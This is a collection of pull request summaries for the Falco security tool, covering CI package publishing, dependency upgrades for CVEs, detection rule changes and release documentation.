test/confs/drops_threshold_oor.yaml
test/falco_tests.yaml
userspace/falco/configuration.cpp
userspace/falco/configuration.h
userspace/falco/event_drops.cpp
userspace/falco/event_drops.h
userspace/falco/falco.cpp

/kind feature
/area engine
/area tests
NONE
Need to update the `falco-tester` container image.
```release-note
NONE
```

Reduce noisiness

---

.circleci/config.yml
README.md
RELEASE.md
docker/falco/Dockerfile
docker/no-driver/Dockerfile
scripts/publish-bin
scripts/publish-deb
scripts/publish-rpm

/kind feature
/area build
This PR introduces scripts to deal with updates of Debian and RPM repositories and modify CI jobs to publish packages (ie. `bin-dev`, `deb-dev`, `rpm-dev`, `bin`, `deb`, `rpm`) to our S3 bucket which serves those files at https://download.falco.org/
Fixes #1567
~~If this works as expected, a follow-up PR will update the configuration to publish stable packages too (ie. `bin`, `deb`, `rpm`) in the same way.~~
I'm confident that scripts work as expected, so I decided to include the stable packages too in this PR. A follow-up PR might come in case of unexpected issues.
The …

publish packages to S3 (download.falco.org)

---

.circleci/config.yml

/kind bug
/area build
Since `amazon/aws-cli` does not include the tar util (which must be present in the image, as per CircleCI requirement) we are switching from `amazon/aws-cli` to `centos`.
That should fix the broken CI job (see
https://app.circleci.com/pipelines/github/falcosecurity/falco/1391/workflows/c1e1bc39-f008-4644-b8bf-45d1105e1978/jobs/11263)
and complete #1577 (I hope :smile_cat: ).
Fixes #
/milestone 0.28.0
/cc @leodido 
/cc @fntlnz 
```release-note
NONE
```

fix(.circleci): tar must be present in the image

---

test/requirements.txt

/kind cleanup
/area tests
CVE-2020-14343 affects one of the dependencies the Falco (integration) test suite uses.
NONE.
This **does not affect** Falco itself.
I'll build and publish a new `falco-tester` container image as soon as possible.
```release-note
NONE
```

fix(falco/test): bump pyyaml from 5.3.1 to 5.4

---

userspace/engine/lua/parser.lua

/kind bug
> /kind design
> /area build
/area engine
> /area rules
> /area tests
Fix a bug in rule condition parsing that allows fields starting with numbers to be parsed properly.
Fixes #
```release-note
Fix a bug in rule …
```

Properly parse numbers in condition fields

---

test/run_performance_tests.sh
test/run_regression_tests.sh

/kind cleanup
/area tests
This PR updates the download URLs of trace files that are used in the test suites.
It also allows specifying a different base URL in case one wants to use different files for development purposes.
Fixes #
/milestone 0.28.0
```release-note
NONE
```

update: fixtures URLs

---

test/README.md

/area tests
Fixes #
```release-note
NONE
```

docs(test): express that grpcurl and virtualenv are needed

---

CHANGELOG.md
RELEASE.md

NONE
Adds the CHANGELOG for Falco 0.28.0
NONE
While prepping Falco 0.28.0 I noticed the correct date (YYYY-MM-DD) to provide to GitHub filters is not the day before the previous release. Instead, it's the day the latest release happened.
Also added clearer instructions on how to generate the CHANGELOG.
```release-note
NONE
```

Prepping Falco 0.28.0

---

.circleci/config.yml
CHANGELOG.md

/kind bug
/area build
Fixes the `publish/packages` job for publishing stable Falco release packages.
NONE
Detected during the release of Falco 0.28 (the publishing mechanism is new).
```release-note
NONE
```

ci: fix missing infra context to publish stable Falco packages

---

userspace/falco/falco.cpp

> /kind bug
> /kind design
/kind feature
> /area build
/area engine
> /area rules
> /area tests
In some cases, it might be useful to know what falco engine version a
given falco binary supports. We already have a --support option that
prints info about the system, config, rules files, etc.
Add a engine_info object, with an engine_version property containing …

Add falco engine info to --support output

---

userspace/engine/json_evt.cpp
userspace/falco/webserver.cpp

This fix has two major points in it:
- when `std::stoll` is used in parse_as_int64 handle all the exceptions it
can throw (https://en.cppreference.com/w/cpp/string/basic_string/stol)
- when `process_k8s_audit_event` an eventual exception in it does not
stop the webserver process. This is done by doing a catch all handle
outside it and by logging an error message to the caller as well as in
stderr
/kind bug
/area engine
Fixes #1575
```release-note
fix: do not stop the webserver for k8s audit logs when …
```

fix(userspace): handle exceptions for process_k8s_audit_event

---

falco.yaml
userspace/engine/falco_utils.h
userspace/falco/configuration.cpp
userspace/falco/configuration.h
userspace/falco/falco.cpp

/kind feature
NONE
This PR makes Falco able to detect a very uncommon situation and alert the user about it.
As everyone probably already knows today, Falco receives events from the drivers through the [libraries](https://github.com/falcosecurity/libs).
Not all the events that the libraries emit are of interest to Falco.
For this reason and other more complex reasons (eg., timeout while reading the event from the ring buffer),
Falco receives timeouts (`SCAP_TIMEOUTS`).
**In the majority of cases**, when Falco receives a timeout it also receives an event that Falco discards.
But, if Falco receives **too many consecutive timeouts without the events** it is likely …

detect consecutive timeouts without events and alert accordingly to a configurable value

---

rules/falco_rules.yaml

/kind bug
> /kind design
> /area build
> /area engine
/area rules
> /area tests
This PR mitigates possible bypasses due to too loose conditions.
Fixes #
```release-note
rule(macro: python_running_sdchecks): macro removed …
```

avoid loose conditions in rules and macros

---

rules/falco_rules.yaml

/kind cleanup
/area rules
Cleans up no longer valid references.
Fixes #1633 
The default Falco ruleset references (mostly to ignore the containers which runs with) OCI image repositories that are no longer available or maintained. One example is `docker.io/sysdig/falco`, which is replaced by `docker.io/falcosecurity/falco`.
```release-note
rule(list `falco_privileged_images`): remove deprecated Falco's OCI image repositories
rule(list `falco_sensitive_mount_images`): remove deprecated Falco's OCI image repositories
rule(macro …
```

Remove deprecated OCI image repositories in default ruleset

---

RELEASE.md

/area build
- update a broken link
- small updates in the text to match the format
n/a
```release-note
NONE
```

urelease/docs: fix link and small refactor in the text

---

rules/falco_rules.yaml

Signed-off-by: ismail yenigul <ismailyenigul@gmail.com>
> /kind bug
> /kind design
> /area build
> /area engine
/area rules
> /area tests
Creates macro for AWS EKS images to use in rule: Launch Privileged Container
Fixes # …

macro for EKS images to use in rule: Launch Privileged Container

---

CHANGELOG.md

changelog: add notes for 0.28.1 release
Fixes #
```release-note
NONE
```

changelog: add notes for 0.28.1 release

---

RELEASE.md

none
This PR documents blog announcement as part of post-release tasks.
```release-note
NONE
```

docs(release.md): add blog announcement to post-release tasks

---

CHANGELOG.md

This PR updates the changelog, adding notes for 0.28.2 release.
```release-note
NONE
```

changelog: add notes for 0.28.2 release

---

CHANGELOG.md

Signed-off-by: maxgio92 <massimiliano.giovagnoli.1992@gmail.com>
As the 0.28.2 has been dismissed in favor of 0.29.0, the changelog should be updated accordingly.
More info on #1653 
```release-note
NONE
```

revert: add notes for 0.28.2 release

---

rules/k8s_audit_rules.yaml

/area rules
Add namespace-controller, statefulset-controller, disruption-controller, job-controller, horizontal-pod-autoscaler and persistent-volume-binder as additional default k8s controller service accounts to the `known_sa_list` list. This addition prevents these controllers from triggering a warning as they are created in the kube-system namespace.
These controllers are default k8s controllers according to the docs (https://kubernetes.io/docs/reference/command-line-tools-reference/kube-controller-manager/)
```
--controllers strings&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Default: "*"
```
> A  list of controllers to enable. '*' enables all on-by-default  controllers, 'foo' enables the controller named 'foo', '-foo' disables  the …

add known k8s service accounts

---

test/requirements.txt

/kind bug
> /kind design
/area build
> /area engine
> /area rules
/area tests
`urllib3` is a dependency used in our test suite. Version v1.25.9 is affected by a security vulnerability (CVE-2021-33503) which has been fixed in v1.26.5.
See:
- https://github.com/urllib3/urllib3/security/advisories/GHSA-q2q7-5pp4-w6pg
- …

build(test): upgrade urllib3 to 1.26.5

---

cmake/modules/falcosecurity-libs.cmake

/kind bug
> /kind design
/kind feature
/area build
> /area engine
> /area rules
> /area tests
This PR upgrades the libs and driver version to `17f5df52a7d9ed6bb12d3b1768460def8439936d`
Changes included in this `libs` version can be found here:
https://github.com/falcosecurity/libs/compare/13ec67ebd23417273275296813066e07cb85bc91...17f5df52a7d9ed6bb12d3b1768460 …

build: upgrade driver version to 17f5d

---

rules/falco_rules.yaml
userspace/engine/falco_engine_version.h

/kind feature
/area rules
Adds a rule to alert the Falco users about the delegation of page faults to user-space through an unprivileged successful userfaultfd call.
Refs #676 
To try it out you need to build Falco against [this branch in libs](https://github.com/falcosecurity/libs/pull/50).
Holding this PR until that branch is merged into libs.
/hold
Also, while doing this PR I took the chance to include a simple addition on the rule detecting kernel module injections from containers: it was missing the container …

rule to detect successful unprivileged userfaultfd events

---

.circleci/config.yml
docker/builder/Dockerfile

> /kind bug
/kind cleanup
> /kind design
/area build
> /area engine
> /area rules
> /area tests
Fixes #1638 
```release-note
NONE
```

chore: remove ncurses dependency

---

RELEASE.md

/area build
This PR updates the `RELEASE.md` doc reflecting the new release cycle as discussed by Falco's maintainers.
Starting from now, we plan to release 3 times per year.
Thanks to @fntlnz @leodido @kris-nova @mstemm 
/milestone 0.30.0
Fixes #
```release-note
NONE
```

docs(RELEASE.md): switch to 3 releases per year

---

.circleci/config.yml

Signed-off-by: Michele Zuccala <michele@zuccala.com>
/kind bug
/area build
As per [this](https://packages.debian.org/search?keywords=python3-pip&searchon=names&suite=stable&section=all), new package name for `pip` in Debian Bullseye is `python3-pip`.
NONE
NONE
```release-note
NONE
```

Use new Debian 11 package names for python-pip

---

docker/falco/Dockerfile

/kind bug
/area build
This PR updates base image with libssl-dev package required to compile kernel module.
It also updates upstream container reference, since recently Buster becomes new stable and container refuses to build.
Fixes https://github.com/falcosecurity/falco/issues/1718
Since Debian Bullseye become new `stable`, it is also required to update base image reference.
```release-note
NONE
```

Adding libssl-dev, fixing upstream image reference.

---

cmake/modules/falcosecurity-libs.cmake
userspace/falco/falco.cpp

/kind feature
/area engine
See https://github.com/falcosecurity/libs/issues/43
Fixes #778 
To enable this feature, the current node name (i.e. the one on which Falco is running) needs to be passed to Falco 
via the `--k8s-node` command-line option.
When Falco is deployed as a DaemonSet, the easiest way to automatically pass that value is by using the [downward API](https://kubernetes.io/docs/tasks/inject-data-application/environment-variable-expose-pod-information/#the-downward-api). For example:
```yaml
...
containers:
- name: falco
...
args:
- /usr/bin/falco
- --cri
- …
```

new: k8s node filtering

---

rules/falco_rules.yaml

Signed-off-by: Alberto Pellitteri <albertopellitteri96@gmail.com>
Co-authored-by: darryk10 <stefano.chierici@sysdig.com>
/area rules
Found and added some new miner pools that enhance miner detection.
**Does this PR introduce a user-facing change?**: 
```release-note
rule(list miner_domains): add new miner domains
rule(list https_miner_domains): add new miner domains
```

Add new miner pools to miner domain lists to improve detection 

---

rules/falco_rules.yaml

/kind cleanup
/area rules
Removes a duplicate ECR repo starts_with rule in the allowed_aws_ecr_registry_root_for_eks macro
```release-note
NONE
```

Remove duplicate allowed ecr registry rule
